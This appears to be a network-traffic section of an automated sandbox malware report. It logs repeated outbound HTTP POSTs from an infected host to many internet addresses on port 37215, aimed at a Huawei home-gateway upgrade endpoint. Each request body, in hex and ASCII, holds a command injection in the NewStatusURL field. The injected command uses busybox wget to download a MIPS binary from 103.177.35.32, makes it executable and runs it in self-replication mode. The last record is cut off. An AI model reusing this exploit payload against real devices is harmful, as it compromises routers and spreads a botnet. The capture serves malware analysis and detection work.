                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1766192.168.2.2339768216.60.194.20837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.584141970 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1767192.168.2.2345770197.87.92.18937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.584166050 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1768192.168.2.2346314197.222.77.4537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.584336996 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1769192.168.2.2355518121.102.10.23537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.584350109 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1770192.168.2.233313441.247.195.2237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.584391117 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1771192.168.2.234433814.213.31.12937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.584404945 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1772192.168.2.2352198197.187.214.22037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.584424973 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1773192.168.2.2338244197.216.83.20437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.584429026 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1774192.168.2.2340200157.236.136.18337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.584436893 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1775192.168.2.2338774197.116.161.6737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.584436893 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
